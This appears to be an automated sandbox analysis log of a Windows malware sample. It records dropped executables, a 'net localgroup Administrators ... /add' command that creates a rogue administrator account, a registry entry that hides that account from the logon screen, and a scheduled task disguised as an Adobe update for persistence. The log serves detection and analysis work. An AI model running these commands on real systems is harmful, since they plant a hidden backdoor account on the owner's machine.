              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,0_2_00407F31
              Source: 8lOT1rXZp5.exeStatic PE information: real checksum: 0x4168fb should be: 0x41ff11
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00419210 push eax; ret 0_2_0041923E
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00418F40 push ecx; mov dword ptr [esp], ecx0_2_00418F41
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C50E96 push ecx; ret 7_2_00C50EA9
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A20E96 push ecx; ret 10_2_00A20EA9
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C0E96 push ecx; ret 13_2_005C0EA9

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comJump to dropped file

              Boot Survival

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList fsUIwEqMAc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CC231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00CC231B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C4FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_00C4FC88
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A9231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00A9231B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A1FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00A1FC88
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0063231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_0063231B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005BFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_005BFC88
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
